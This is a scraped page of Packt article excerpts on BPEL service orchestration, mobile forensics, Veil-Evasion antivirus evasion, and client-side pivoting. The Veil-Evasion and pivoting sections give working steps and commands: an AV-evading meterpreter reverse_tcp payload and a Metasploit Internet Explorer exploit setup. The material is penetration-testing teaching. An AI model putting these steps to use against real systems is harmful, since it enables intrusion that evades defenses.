16 Jul 2014
13 min read
Service Invocation Time for action – creating the book warehousing process Let's create the BookWarehousingBPEL BPEL process: We will open the SOA composite by double-clicking on the Bookstore in the process tree. In the composite, we can see both Bookstore BPEL processes and their WSDL interfaces. We will add a new BPEL process by dragging-and-dropping the BPEL Process service component from the right-hand side toolbar. An already-familiar dialog window will open, where we will specify the BPEL 2.0 version, enter the process name as BookWarehousingBPEL, modify the namespace to http://packtpub.com/Bookstore/BookWarehousingBPEL, and select Synchronous BPEL Process. We will leave all other fields to their default values: Insert image 8963EN_02_03.png Next, we will wire the BookWarehousingBPEL component with the BookstoreABPEL and BookstoreBBPEL components. This way, we will establish a partner link between them. First, we will create the wire to the BookstoreBBPEL component (although the order doesn't matter). To do this, you have to click on the bottom-right side of the component. Once you place the mouse pointer above the component, circles on the edges will appear. You need to start with the circle labelled as Drag to add a new Reference and connect it with the service interface circle, as shown in the following figure: Insert image 8963EN_02_04.png You do the same to wire the BookWarehousingBPEL component with the BookstoreABPEL component: Insert image 8963EN_02_05.png We should see the following screenshot. Please notice that the BookWarehousingBPEL component is wired to the BookstoreABPEL and BookstoreBBPEL components: Insert image 8963EN_02_06.png What just happened? We have added the BookWarehousingBPEL component to our SOA composite and wired it to the BookstoreABPEL and BookstoreBBPEL components. Creating the wires between components means that references have been created and relations between components have been established. In other words, we have expressed that the BookWarehousingBPEL component will be able to invoke the BookstoreABPEL and BookstoreBBPEL components. This is exactly what we want to achieve with our BookWarehousingBPEL process, which will orchestrate both bookstore BPELs. Once we have created the components and wired them accordingly, we are ready to implement the BookWarehousingBPEL process. What just happened? We have implemented the process flow logic for the BookWarehousingBPEL process. It actually orchestrated two other services. It invoked the BookstoreA and BookstoreB BPEL processes that we've developed in the previous chapter. Here, these two BPEL processes acted like services. First, we have created the XML schema elements for the request and response messages of the BPEL process. We have created four variables: BookstoreARequest, BookstoreAResponse, BookstoreBRequest, and BookstoreBResponse. The BPEL code for variable declaration looks like the code shown in the following screenshot: Insert image 8963EN_02_18b.png Then, we have added the <assign> activity to prepare a request for both the bookstore BPEL processes. Then, we have copied the BookData element from inputVariable to the BookstoreARequest and BookstoreBRequest variables. The following BPEL code has been generated: Insert image 8963EN_02_18c.png Next, we have invoked both the bookstore BPEL services using the <invoke> activity. The BPEL source code reads like the following screenshot: Insert image 8963EN_02_18d.png Finally, we have added the <if> activity to select the bookstore with the lowest stock quantity: Insert image 8963EN_02_18e.png With this, we have concluded the development of the book warehousing BPEL process and are ready to deploy and test it. Deploying and testing the book warehousing BPEL We will deploy the project to the SOA Suite process server the same way as we did in the previous chapter, by right-clicking on the project and selecting Deploy. Then, we will navigate through the options. As we redeploy the whole SOA composite, make sure the Overwrite option is selected. You should check if the compilation and the deployment have been successful. Then, we will log in to the Enterprise Manager console, select the project bookstore, and click on the Test button. Be sure to select bookwarehousingbpel_client for the test. After entering the parameters, as shown in the following figure, we can click on the Test Web Service button to initiate the BPEL process, and we should receive an answer (Bookstore A or Bookstore B, depending on the data that we have entered). Remember that our BookWarehousingBPEL process actually orchestrated two other services. It invoked the BookstoreA and BookstoreB BPEL processes. To verify this, we can launch the flow trace (click on the Launch Flow Trace button) in the Enterprise Manager console, and we will see that the two bookstore BPEL processes have been invoked, as shown: Insert image 8963EN_02_19.png An even more interesting view is the flow view, which also shows that both bookstore services have been invoked. Click on BookWarehousingBPEL to open up the audit trail: Insert image 8963EN_02_20.png Understanding partner links When invoking services, we have often mentioned partner links. Partner links denote all the interactions that a BPEL process has with the external services. There are two possibilities: The BPEL process invokes operations on other services. The BPEL process receives invocations from clients. One of the clients is the user of the BPEL process, who makes the initial invocation. Other clients are services, for example, those that have been invoked by the BPEL process, but may return replies. Links to all the parties that BPEL interacts with are called partner links. Partner links can be links to services that are invoked by the BPEL process. These are sometimes called invoked partner links. Partner links can also be links to clients, and can invoke the BPEL process. Such partner links are sometimes called client partner links. Note that each BPEL process has at least one client partner link, because there has to be a client that first invokes the BPEL process. Usually, a BPEL process will also have several invoked partner links, because it will most likely invoke several services. In our case, the BookWarehousingBPEL process has one client partner link and two invoked partner links, BookstoreABPEL and BookstoreBBPEL. You can observe this on the SOA composite design view and on the BPEL process itself, where the client partner links are located on the left-hand side, while the invoked partner links are located on the right-hand side of the design view. Partner link types Describing situations where the service is invoked by the process and vice versa requires selecting a certain perspective. We can select the process perspective and describe the process as requiring portTypeA on the service and providing portTypeB to the service. Alternatively, we select the service perspective and describe the service as offering portTypeA to the BPEL process and requiring portTypeB from the process. Partner link types allow us to model such relationships as a third party. We are not required to take a certain perspective; rather, we just define roles. A partner link type must have at least one role and can have at most two roles. The latter is the usual case. For each role, we must specify a portType that is used for interaction. Partner link types are defined in the WSDLs. If we take a closer look at the BookWarehousingBPEL.wsdl file, we can see the following partner link type definition: Insert image 8963EN_02_22.png If we specify only one role, we express the willingness to interact with the service, but do not place any additional requirements on the service. Sometimes, existing services will not define a partner link type. Then, we can wrap the WSDL of the service and define partner link types ourselves. Now that we have become familiar with the partner link types and know that they belong to WSDL, it is time to go back to the BPEL process definition, more specifically to the partner links. Defining partner links Partner links are concrete references to services that a BPEL business process interacts with. They are specified near the beginning of the BPEL process definition document, just after the <process> tag. Several <partnerLink> definitions are nested within the <partnerLinks> element: <process ...>   <partnerLinks>   <partnerLink ... /> <partnerLink ... />        ...      </partnerLinks>   <sequence>      ... </sequence> </process> For each partner link, we have to specify the following: name: This serves as a reference for interactions via that partner link. partnerLinkType: This defines the type of the partner link. myRole: This indicates the role of the BPEL process itself. partnerRole: This indicates the role of the partner. initializePartnerRole: This indicates whether the BPEL engine should initialize the partner link's partner role value. This is an optional attribute and should only be used with partner links that specify the partner role. We define both roles (myRole and partnerRole) only if the partnerLinkType specifies two roles. If the partnerLinkType specifies only one role, the partnerLink also has to specify only one role—we omit the one that is not needed. Let's go back to our example, where we have defined the BookstoreABPEL partner link type. To define a partner link, we need to specify the partner roles, because it is a synchronous relation. The definition is shown in the following code excerpt: Insert image 8963EN_02_23.png With this, we have concluded the discussion on partner links and partner link types. We will continue with the parallel service invocation. Parallel service invocation BPEL also supports parallel service invocation. In our example, we have invoked Bookstore A and Bookstore B sequentially. This way, we need to wait for the response from the first service and then for the response from the second service. If these services take longer to execute, the response times will be added together. If we invoke both services in parallel, we only need to wait for the duration of the longer-lasting call, as shown in the following screenshot: BPEL has several possibilities for parallel flows, which will be described in detail in Chapter 8, Dynamic Parallel Invocations. Here, we present the basic parallel service invocation using the <flow> activity. Insert image 8963EN_02_24.png To invoke services in parallel, or to perform any other activities in parallel, we can use the <flow> activity. Within the <flow> activity, we can nest an arbitrary number of flows, and all will execute in parallel. Let's try and modify our example so that Bookstore A and B will be invoked in parallel. Time for action – developing parallel flows Let's now modify the BookWarehousingBPEL process so that the BookstoreA and BookstoreB services will be invoked in parallel. We should do the following: To invoke BookstoreA and BookstoreB services in parallel, we need to add the Flow structured activity to the process flow just before the first invocation, as shown in the following screenshot: Insert image 8963EN_02_25.png We see that two parallel branches have been created. We simply drag-and-drop both the invoke activities into the parallel branches: Insert image 8963EN_02_26.png That's all! We can create more parallel branches if we need, by clicking on the Add Sequence icon. What just happened? We have modified the BookWarehousingBPEL process so that the BookstoreA and BookstoreB <invoke> activities are executed in parallel. A corresponding <flow>activity has been created in the BPEL source code. Within the <flow> activity, both <invoke> activities are nested. Please notice that each <invoke> activity is placed within its own <sequence> activity. T his would make sense if we would require more than one activity in each parallel branch. The BPEL source code looks like the one shown in the following screenshot: Insert image 8963EN_02_27.png Deploying and testing the parallel invocation We will deploy the project to the SOA Suite process server the same way we did in the previous sample. Then, we will log in to the Enterprise Manager console, select the project Bookstore, and click on the Test Web Service button. To observe that the services have been invoked in parallel, we can launch the flow trace (click on the Launch Flow Trace button) in the Enterprise Manager console, click on the book warehousing BPEL processes, and activate the flow view, which shows that both bookstore services have been invoked in parallel. Understanding parallel flow To invoke services concurrently, we can use the <flow> construct. In the following example, the three <invoke> operations will perform concurrently: <process ...>    ... <sequence> <!-- Wait for the incoming request to start the process --> <receive ... />   <!-- Invoke a set of related services, concurrently --> <flow> <invoke ... /> <invoke ... /> <invoke ... /> </flow>      ... <!-- Return the response --> <reply ... /> </sequence> </process> We can also combine and nest the <sequence> and <flow> constructs that allow us to define several sequences that execute concurrently. In the following example, we have defined two sequences, one that consists of three invocations, and one with two invocations. Both sequences will execute concurrently: <process ...>    ... <sequence>   <!-- Wait for the incoming request to start the process --> <receive ... />   <!-- Invoke two sequences concurrently --> <flow> <!-- The three invokes below execute sequentially --> <sequence> <invoke ... /> <invoke ... /> <invoke ... /> </sequence> <!-- The two invokes below execute sequentially --> <sequence> <invoke ... /> <invoke ... /> </sequence> </flow>        ... <!-- Return the response --> <reply ... /> </sequence> </process> We can use other activities as well within the <flow> activity to achieve parallel execution. With this, we have concluded our discussion on the parallel invocation. Pop quiz – service invocation Q1. Which activity is used to invoke services from BPEL processes? <receive> <invoke> <sequence> <flow> <process> <reply> Q2. Which parameters do we need to specify for the <invoke> activity? endpointURL partnerLink operationName operation portType portTypeLink Q3. In which file do we declare partner link types? Q4. Which activity is used to execute service invocation and other BPEL activities in parallel? <receive> <invoke> <sequence> <flow> <process> <reply> Summary In this chapter, we learned how to invoke services and orchestrate services. We explained the primary mission of BPEL—service orchestration. It follows the concept of programming-in-the-large. We have developed a BPEL process that has invoked two services and orchestrated them. We have become familiar with the <invoke> activity and understood the service invocation's background, particularly partner links and partner link types. We also learned that from BPEL, it is very easy to invoke services in parallel. To achieve this, we use the <flow> activity. Within <flow>, we can not only nest several <invoke> activities but also other BPEL activities. Now, we are ready to learn about variables and data manipulation, which we will do in the next chapter.  
Read more
  • 0
  • 0
  • 2942

article-image-introduction-mobile-forensics
Packt
10 Jul 2014
18 min read
Save for later

Introduction to Mobile Forensics

Packt
10 Jul 2014
18 min read
(For more resources related to this topic, see here.) In 2013, there were almost as many mobile cellular subscriptions as there were people on earth, says International Telecommunication Union (ITU). The following figure shows the global mobile cellular subscriptions from 2005 to 2013. Mobile cellular subscriptions are moving at lightning speed and passed a whopping 7 billion early in 2014. Portio Research Ltd. predicts that mobile subscribers will reach 7.5 billion by the end of 2014 and 8.5 billion by the end of 2016. Mobile cellular subscription growth from 2005 to 2013 Smartphones of today, such as the Apple iPhone, Samsung Galaxy series, and BlackBerry phones, are compact forms of computers with high performance, huge storage, and enhanced functionalities. Mobile phones are the most personal electronic device a user accesses. They are used to perform simple communication tasks, such as calling and texting, while still providing support for Internet browsing, e-mail, taking photos and videos, creating and storing documents, identifying locations with GPS services, and managing business tasks. As new features and applications are incorporated into mobile phones, the amount of information stored on the devices is continuously growing. Mobiles phones become portable data carriers, and they keep track of all your moves. With the increasing prevalence of mobile phones in peoples' daily lives and in crime, data acquired from phones become an invaluable source of evidence for investigations relating to criminal, civil, and even high-profile cases. It is rare to conduct a digital forensic investigation that does not include a phone. Mobile device call logs and GPS data were used to help solve the attempted bombing in Times Square, New York, in 2010. The details of the case can be found at http://www.forensicon.com/forensics-blotter/cell-phone-email-forensics-investigation-cracks-nyc-times-square-car-bombing-case/. The science behind recovering digital evidence from mobile phones is called mobile forensics. Digital evidence is defined as information and data that is stored on, received, or transmitted by an electronic device that is used for investigations. Digital evidence encompasses any and all digital data that can be used as evidence in a case. Mobile forensics Digital forensics is a branch of forensic science, focusing on the recovery and investigation of raw data residing in electronic or digital devices. Mobile forensics is a branch of digital forensics related to the recovery of digital evidence from mobile devices. Forensically sound is a term used extensively in the digital forensics community to qualify and justify the use of particular forensic technology or methodology. The main principle for a sound forensic examination of digital evidence is that the original evidence must not be modified. This is extremely difficult with mobile devices. Some forensic tools require a communication vector with the mobile device, thus standard write protection will not work during forensic acquisition. Other forensic acquisition methods may involve removing a chip or installing a bootloader on the mobile device prior to extracting data for forensic examination. In cases where the examination or data acquisition is not possible without changing the configuration of the device, the procedure and the changes must be tested, validated, and documented. Following proper methodology and guidelines is crucial in examining mobile devices as it yields the most valuable data. As with any evidence gathering, not following the proper procedure during the examination can result in loss or damage of evidence or render it inadmissible in court. The mobile forensics process is broken into three main categories: seizure, acquisition, and examination/analysis. Forensic examiners face some challenges while seizing the mobile device as a source of evidence. At the crime scene, if the mobile device is found switched off, the examiner should place the device in a faraday bag to prevent changes should the device automatically power on. Faraday bags are specifically designed to isolate the phone from the network. If the phone is found switched on, switching it off has a lot of concerns attached to it. If the phone is locked by a PIN or password or encrypted, the examiner will be required to bypass the lock or determine the PIN to access the device. Mobile phones are networked devices and can send and receive data through different sources, such as telecommunication systems, Wi-Fi access points, and Bluetooth. So if the phone is in a running state, a criminal can securely erase the data stored on the phone by executing a remote wipe command. When a phone is switched on, it should be placed in a faraday bag. If possible, prior to placing the mobile device in the faraday bag, disconnect it from the network to protect the evidence by enabling the flight mode and disabling all network connections (Wi-Fi, GPS, Hotspots, and so on). This will also preserve the battery, which will drain while in a faraday bag and protect against leaks in the faraday bag. Once the mobile device is seized properly, the examiner may need several forensic tools to acquire and analyze the data stored on the phone. Mobile device forensic acquisition can be performed using multiple methods, which are defined later. Each of these methods affects the amount of analysis required. Should one method fail, another must be attempted. Multiple attempts and tools may be necessary in order to acquire the most data from the mobile device. Mobile phones are dynamic systems that present a lot of challenges to the examiner in extracting and analyzing digital evidence. The rapid increase in the number of different kinds of mobile phones from different manufacturers makes it difficult to develop a single process or tool to examine all types of devices. Mobile phones are continuously evolving as existing technologies progress and new technologies are introduced. Furthermore, each mobile is designed with a variety of embedded operating systems. Hence, special knowledge and skills are required from forensic experts to acquire and analyze the devices. Mobile forensic challenges One of the biggest forensic challenges when it comes to the mobile platform is the fact that data can be accessed, stored, and synchronized across multiple devices. As the data is volatile and can be quickly transformed or deleted remotely, more effort is required for the preservation of this data. Mobile forensics is different from computer forensics and presents unique challenges to forensic examiners. Law enforcement and forensic examiners often struggle to obtain digital evidence from mobile devices. The following are some of the reasons: Hardware differences: The market is flooded with different models of mobile phones from different manufacturers. Forensic examiners may come across different types of mobile models, which differ in size, hardware, features, and operating system. Also, with a short product development cycle, new models emerge very frequently. As the mobile landscape is changing each passing day, it is critical for the examiner to adapt to all the challenges and remain updated on mobile device forensic techniques. Mobile operating systems: Unlike personal computers where Windows has dominated the market for years, mobile devices widely use more operating systems, including Apple's iOS, Google's Android, RIM's BlackBerry OS, Microsoft's Windows Mobile, HP's webOS, Nokia's Symbian OS, and many others. Mobile platform security features: Modern mobile platforms contain built-in security features to protect user data and privacy. These features act as a hurdle during the forensic acquisition and examination. For example, modern mobile devices come with default encryption mechanisms from the hardware layer to the software layer. The examiner might need to break through these encryption mechanisms to extract data from the devices. Lack of resources: As mentioned earlier, with the growing number of mobile phones, the tools required by a forensic examiner would also increase. Forensic acquisition accessories, such as USB cables, batteries, and chargers for different mobile phones, have to be maintained in order to acquire those devices. Generic state of the device: Even if a device appears to be in an off state, background processes may still run. For example, in most mobiles, the alarm clock still works even when the phone is switched off. A sudden transition from one state to another may result in the loss or modification of data. Anti-forensic techniques: Anti-forensic techniques, such as data hiding, data obfuscation, data forgery, and secure wiping, make investigations on digital media more difficult. Dynamic nature of evidence: Digital evidence may be easily altered either intentionally or unintentionally. For example, browsing an application on the phone might alter the data stored by that application on the device. Accidental reset: Mobile phones provide features to reset everything. Resetting the device accidentally while examining may result in the loss of data. Device alteration: The possible ways to alter devices may range from moving application data, renaming files, and modifying the manufacturer's operating system. In this case, the expertise of the suspect should be taken into account. Passcode recovery: If the device is protected with a passcode, the forensic examiner needs to gain access to the device without damaging the data on the device. Communication shielding: Mobile devices communicate over cellular networks, Wi-Fi networks, Bluetooth, and Infrared. As device communication might alter the device data, the possibility of further communication should be eliminated after seizing the device. Lack of availability of tools: There is a wide range of mobile devices. A single tool may not support all the devices or perform all the necessary functions, so a combination of tools needs to be used. Choosing the right tool for a particular phone might be difficult. Malicious programs: The device might contain malicious software or malware, such as a virus or a Trojan. Such malicious programs may attempt to spread over other devices over either a wired interface or a wireless one. Legal issues: Mobile devices might be involved in crimes, which can cross geographical boundaries. In order to tackle these multijurisdictional issues, the forensic examiner should be aware of the nature of the crime and the regional laws. Mobile phone evidence extraction process Evidence extraction and forensic examination of each mobile device may differ. However, following a consistent examination process will assist the forensic examiner to ensure that the evidence extracted from each phone is well documented and that the results are repeatable and defendable. There is no well-established standard process for mobile forensics. However, the following figure provides an overview of process considerations for extraction of evidence from mobile devices. All methods used when extracting data from mobile devices should be tested, validated, and well documented. A great resource for handling and processing mobile devices can be found at http://digital-forensics.sans.org/media/mobile-device-forensic-process-v3.pdf. Mobile phone evidence extraction process The evidence intake phase The evidence intake phase is the starting phase and entails request forms and paperwork to document ownership information and the type of incident the mobile device was involved in, and outlines the type of data or information the requester is seeking. Developing specific objectives for each examination is the critical part of this phase. It serves to clarify the examiner's goals. The identification phase The forensic examiner should identify the following details for every examination of a mobile device: The legal authority The goals of the examination The make, model, and identifying information for the device Removable and external data storage Other sources of potential evidence We will discuss each of them in the following sections. The legal authority It is important for the forensic examiner to determine and document what legal authority exists for the acquisition and examination of the device as well as any limitations placed on the media prior to the examination of the device. The goals of the examination The examiner will identify how in-depth the examination needs to be based upon the data requested. The goal of the examination makes a significant difference in selecting the tools and techniques to examine the phone and increases the efficiency of the examination process. The make, model, and identifying information for the device As part of the examination, identifying the make and model of the phone assists in determining what tools would work with the phone. Removable and external data storage Many mobile phones provide an option to extend the memory with removable storage devices, such as the Trans Flash Micro SD memory expansion card. In cases when such a card is found in a mobile phone that is submitted for examination, the card should be removed and processed using traditional digital forensic techniques. It is wise to also acquire the card while in the mobile device to ensure data stored on both the handset memory and card are linked for easier analysis. Other sources of potential evidence Mobile phones act as good sources of fingerprint and other biological evidence. Such evidence should be collected prior to the examination of the mobile phone to avoid contamination issues unless the collection method will damage the device. Examiners should wear gloves when handling the evidence. The preparation phase Once the mobile phone model is identified, the preparation phase involves research regarding the particular mobile phone to be examined and the appropriate methods and tools to be used for acquisition and examination. The isolation phase Mobile phones are by design intended to communicate via cellular phone networks, Bluetooth, Infrared, and wireless (Wi-Fi) network capabilities. When the phone is connected to a network, new data is added to the phone through incoming calls, messages, and application data, which modifies the evidence on the phone. Complete destruction of data is also possible through remote access or remote wiping commands. For this reason, isolation of the device from communication sources is important prior to the acquisition and examination of the device. Isolation of the phone can be accomplished through the use of faraday bags, which block the radio signals to or from the phone. Past research has found inconsistencies in total communication protection with faraday bags. Therefore, network isolation is advisable. This can be done by placing the phone in radio frequency shielding cloth and then placing the phone into airplane or flight mode. The processing phase Once the phone has been isolated from the communication networks, the actual processing of the mobile phone begins. The phone should be acquired using a tested method that is repeatable and is as forensically sound as possible. Physical acquisition is the preferred method as it extracts the raw memory data and the device is commonly powered off during the acquisition process. On most devices, the least amount of changes occur to the device during physical acquisition. If physical acquisition is not possible or fails, an attempt should be made to acquire the file system of the mobile device. A logical acquisition should always be obtained as it may contain only the parsed data and provide pointers to examine the raw memory image. The verification phase After processing the phone, the examiner needs to verify the accuracy of the data extracted from the phone to ensure that data is not modified. The verification of the extracted data can be accomplished in several ways. Comparing extracted data to the handset data Check if the data extracted from the device matches the data displayed by the device. The data extracted can be compared to the device itself or a logical report, whichever is preferred. Remember, handling the original device may make changes to the only evidence—the device itself. Using multiple tools and comparing the results To ensure accuracy, use multiple tools to extract the data and compare results. Using hash values All image files should be hashed after acquisition to ensure data remains unchanged. If file system extraction is supported, the examiner extracts the file system and then computes hashes for the extracted files. Later, any individually extracted file hash is calculated and checked against the original value to verify the integrity of it. Any discrepancy in a hash value must be explainable (for example, if the device was powered on and then acquired again, thus the hash values are different). The document and reporting phase The forensic examiner is required to document throughout the examination process in the form of contemporaneous notes relating to what was done during the acquisition and examination. Once the examiner completes the investigation, the results must go through some form of peer-review to ensure the data is checked and the investigation is complete. The examiner's notes and documentation may include information such as the following: Examination start date and time The physical condition of the phone Photos of the phone and individual components Phone status when received—turned on or off Phone make and model Tools used for the acquisition Tools used for the examination Data found during the examination Notes from peer-review The presentation phase Throughout the investigation, it is important to make sure that the information extracted and documented from a mobile device can be clearly presented to any other examiner or to a court. Creating a forensic report of data extracted from the mobile device during acquisition and analysis is important. This may include data in both paper and electronic formats. Your findings must be documented and presented in a manner that the evidence speaks for itself when in court. The findings should be clear, concise, and repeatable. Timeline and link analysis, features offered by many commercial mobile forensics tools, will aid in reporting and explaining findings across multiple mobile devices. These tools allow the examiner to tie together the methods behind the communication of multiple devices. The archiving phase Preserving the data extracted from the mobile phone is an important part of the overall process. It is also important that the data is retained in a useable format for the ongoing court process, for future reference, should the current evidence file become corrupt, and for record keeping requirements. Court cases may continue for many years before the final judgment is arrived at, and most jurisdictions require that data be retained for long periods of time for the purposes of appeals. As the field and methods advance, new methods for pulling data out of a raw, physical image may surface, and then the examiner can revisit the data by pulling a copy from the archives. Practical mobile forensic approaches Similar to any forensic investigation, there are several approaches that can be used for the acquisition and examination/analysis of data from mobile phones. The type of mobile device, the operating system, and the security setting generally dictate the procedure to be followed in a forensic process. Every investigation is distinct with its own circumstances, so it is not possible to design a single definitive procedural approach for all the cases. The following details outline the general approaches followed in extracting data from mobile devices. Mobile operating systems overview One of the major factors in the data acquisition and examination/analysis of a mobile phone is the operating system. Starting from low-end mobile phones to smartphones, mobile operating systems have come a long way with a lot of features. Mobile operating systems directly affect how the examiner can access the mobile device. For example, Android OS gives terminal-level access whereas iOS does not give such an option. A comprehensive understanding of the mobile platform helps the forensic examiner make sound forensic decisions and conduct a conclusive investigation. While there is a large range of smart mobile devices, four main operating systems dominate the market, namely, Google Android, Apple iOS, RIM BlackBerry OS, and Windows Phone. More information can be found at http://www.idc.com/getdoc.jsp?containerId=prUS23946013. Android Android is a Linux-based operating system, and it's a Google open source platform for mobile phones. Android is the world's most widely used smartphone operating system. Sources show that Apple's iOS is a close second (http://www.forbes.com/sites/tonybradley/2013/11/15/android-dominates-market-share-but-apple-makes-all-the-money/). Android has been developed by Google as an open and free option for hardware manufacturers and phone carriers. This makes Android the software of choice for companies who require a low-cost, customizable, lightweight operating system for their smart devices without developing a new OS from scratch. Android's open nature has further encouraged the developers to build a large number of applications and upload them onto Android Market. Later, end users can download the application from Android Market, which makes Android a powerful operating system. iOS iOS, formerly known as the iPhone operating system, is a mobile operating system developed and distributed solely by Apple Inc. iOS is evolving into a universal operating system for all Apple mobile devices, such as iPad, iPod touch, and iPhone. iOS is derived from OS X, with which it shares the Darwin foundation, and is therefore a Unix-like operating system. iOS manages the device hardware and provides the technologies required to implement native applications. iOS also ships with various system applications, such as Mail and Safari, which provide standard system services to the user. iOS native applications are distributed through AppStore, which is closely monitored by Apple. Windows phone Windows phone is a proprietary mobile operating system developed by Microsoft for smartphones and pocket PCs. It is the successor to Windows mobile and primarily aimed at the consumer market rather than the enterprise market. The Windows Phone OS is similar to the Windows desktop OS, but it is optimized for devices with a small amount of storage. BlackBerry OS BlackBerry OS is a proprietary mobile operating system developed by BlackBerry Ltd., known as Research in Motion (RIM), exclusively for its BlackBerry line of smartphones and mobile devices. BlackBerry mobiles are widely used in corporate companies and offer native support for corporate mail via MIDP, which enables wireless sync with Microsoft Exchange, e-mail, contacts, calendar, and so on, while used along with the BlackBerry Enterprise server. These devices are known for their security.
Read more
  • 0
  • 0
  • 13410
article-image-veil-evasion
Packt
18 Jun 2014
6 min read
Save for later

Veil-Evasion

Packt
18 Jun 2014
6 min read
(For more resources related to this topic, see here.) A new AV-evasion framework, written by Chris Truncer, called Veil-Evasion (www.Veil-Evasion.com), is now providing effective protection against the detection of standalone exploits. Veil-Evasion aggregates various shellcode injection techniques into a framework that simplifies management. As a framework, Veil-Evasion possesses several features, which includes the following: It incorporates custom shellcode in a variety of programming languages, including C, C#, and Python It can use Metasploit-generated shellcode It can integrate third-party tools such as Hyperion (encrypts an EXE file with AES-128 bit encryption), PEScrambler, and BackDoor Factory The Veil-Evasion_evasion.cna script allows for Veil-Evasion to be integrated into Armitage and its commercial version, Cobalt Strike Payloads can be generated and seamlessly substituted into all PsExec calls Users have the ability to reuse shellcode or implement their own encryption methods It's functionality can be scripted to automate deployment Veil-Evasion is under constant development and the framework has been extended with modules such as Veil-Evasion-Catapult (the payload delivery system) Veil-Evasion can generate an exploit payload; the standalone payloads include the following options: Minimal Python installation to invoke shellcode; it uploads a minimal Python.zip installation and the 7zip binary. The Python environment is unzipped, invoking the shellcode. Since the only files that interact with the victim are trusted Python libraries and the interpreter, the victim's AV does not detect or alarm on any unusual activity. Sethc backdoor, which configures the victim's registry to launch the sticky keys RDP backdoor. PowerShell shellcode injector. When the payloads have been created, they can be delivered to the target in one of the following two ways: Upload and execute using Impacket and PTH toolkit UNC invocation Veil-Evasion is available from the Kali repositories, such as Veil-Evasion, and it is automatically installed by simply entering apt-get install veil-evasion in a command prompt. If you receive any errors during installation, re-run the /usr/share/veil-evasion/setup/setup.sh script. Veil-Evasion presents the user with the main menu, which provides the number of payload modules that are loaded as well as the available commands. Typing list will list all available payloads, list langs will list the available language payloads, and list <language> will list the payloads for a specific language. Veil-Evasion's initial launch screen is shown in the following screenshot: Veil-Evasion is undergoing rapid development with significant releases on a monthly basis and important upgrades occurring more frequently. Presently, there are 24 payloads designed to bypass antivirus by employing encryption or direct injection into the memory space. These payloads are shown in the next screenshot: To obtain information on a specific payload, type info<payload number / payload name> or info <tab> to autocomplete the payloads that are available. You can also just enter the number from the list. In the following example, we entered 19 to select the python/shellcode_inject/aes_encrypt payload: The exploit includes an expire_payload option. If the module is not executed by the target user within a specified timeframe, it is rendered inoperable. This function contributes to the stealthiness of the attack. The required options include the name of the options as well as the default values and descriptions. If a required value isn't completed by default, the tester will need to input a value before the payload can be generated. To set the value for an option, enter set <option name> and then type the desired value. To accept the default options and create the exploit, type generate in the command prompt. If the payload uses shellcode, you will be presented with the shellcode menu, where you can select msfvenom (the default shellcode) or a custom shellcode. If the custom shellcode option is selected, enter the shellcode in the form of x01x02, without quotes and newlines (n). If the default msfvenom is selected, you will be prompted with the default payload choice of windows/meterpreter/reverse_tcp. If you wish to use another payload, press Tab to complete the available payloads. The available payloads are shown in the following screenshot: In the following example, the [tab] command was used to demonstrate some of the available payloads; however, the default (windows/meterpreter/reverse_tcp) was selected, as shown in the following screenshot: The user will then be presented with the output menu with a prompt to choose the base name for the generated payload files. If the payload was Python-based and you selected compile_to_exe as an option, the user will have the option of either using Pyinstaller to create the EXE file, or generating Py2Exe files, as shown in the following screenshot: The final screen displays information on the generated payload, as shown in the following screenshot: The exploit could also have been created directly from a command line using the following options: kali@linux:~./Veil-Evasion.py -p python/shellcode_inject/aes_encrypt -o -output --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.43.134 LPORT=4444 Once an exploit has been created, the tester should verify the payload against VirusTotal to ensure that it will not trigger an alert when it is placed on the target system. If the payload sample is submitted directly to VirusTotal and it's behavior flags it as malicious software, then a signature update against the submission can be released by antivirus (AV) vendors in as little as one hour. This is why users are clearly admonished with the message "don't submit samples to any online scanner!" Veil-Evasion allows testers to use a safe check against VirusTotal. When any payload is created, a SHA1 hash is created and added to hashes.txt, located in the ~/veil-output directory. Testers can invoke the checkvt script to submit the hashes to VirusTotal, which will check the SHA1 hash values against its malware database. If a Veil-Evasion payload triggers a match, then the tester knows that it may be detected by the target system. If it does not trigger a match, then the exploit payload will bypass the antivirus software. A successful lookup (not detectable by AV) using the checkvt command is shown as follows: Testing, thus far supports the finding that if checkvt does not find a match on VirusTotal, the payload will not be detected by the target's antivirus software. To use with the Metasploit Framework, use exploit/multi/handler and set PAYLOAD to be windows/meterpreter/reverse_tcp (the same as the Veil-Evasion payload option), with the same LHOST and LPORT used with Veil-Evasion as well. When the listener is functional, send the exploit to the target system. When the listeners launch it, it will establish a reverse shell back to the attacker's system. Summary Kali provides several tools to facilitate the development, selection, and activation of exploits, including the internal exploit-db database as well as several frameworks that simplify the use and management of the exploits. Among these frameworks, the Metasploit Framework and Armitage are particularly important; however, Veil-Evasion enhances both with its ability to bypass antivirus detection. Resources for Article: Further resources on this subject: Kali Linux – Wireless Attacks [Article] Web app penetration testing in Kali [Article] Customizing a Linux kernel [Article]
Read more
  • 0
  • 0
  • 4770

article-image-using-client-pivot-point
Packt
17 Jun 2014
6 min read
Save for later

Using the client as a pivot point

Packt
17 Jun 2014
6 min read
Pivoting To set our potential pivot point, we first need to exploit a machine. Then we need to check for a second network card in the machine that is connected to another network, which we cannot reach without using the machine that we exploit. As an example, we will use three machines with the Kali Linux machine as the attacker, a Windows XP machine as the first victim, and a Windows Server 2003 machine the second victim. The scenario is that we get a client to go to our malicious site, and we use an exploit called Use after free against Microsoft Internet Explorer. This type of exploit has continued to plague the product for a number of revisions. An example of this is shown in the following screenshot from the Exploit DB website: The exploit listed at the top of the list is one that is against Internet Explorer 9. As an example, we will target the exploit that is against Internet Explorer 8; the concept of the attack is the same. In simple terms, Internet Explorer developers continue to make the mistake of not cleaning up memory after it is allocated. Start up your metasploit tool by entering msfconsole. Once the console has come up, enter search cve-2013-1347 to search for the exploit. An example of the results of the search is shown in the following screenshot: One concern is that it is rated as good, but we like to find ratings of excellent or better when we select our exploits. For our purposes, we will see whether we can make it work. Of course, there is always a chance we will not find what we need and have to make the choice to either write our own exploit or document it and move on with the testing. For the example we use here, the Kali machine is 192.168.177.170, and it is what we set our LHOST to. For your purposes, you will have to use the Kali address that you have. We will enter the following commands in the metasploit window: use exploit/windows/browser/ie_cgenericelement_uaf set SRVHOST 192.168.177.170 set LHOST 192.168.177.170 set PAYLOAD windows/meterpreter/reverse_tcp exploit An example of the results of the preceding command is shown in the following screenshot: As the previous screenshot shows, we now have the URL that we need to get the user to access. For our purposes, we will just copy and paste it in Internet Explorer 8, which is running on the Windows XP Service Pack 3 machine. Once we have pasted it, we may need to refresh the browser a couple of times to get the payload to work; however, in real life, 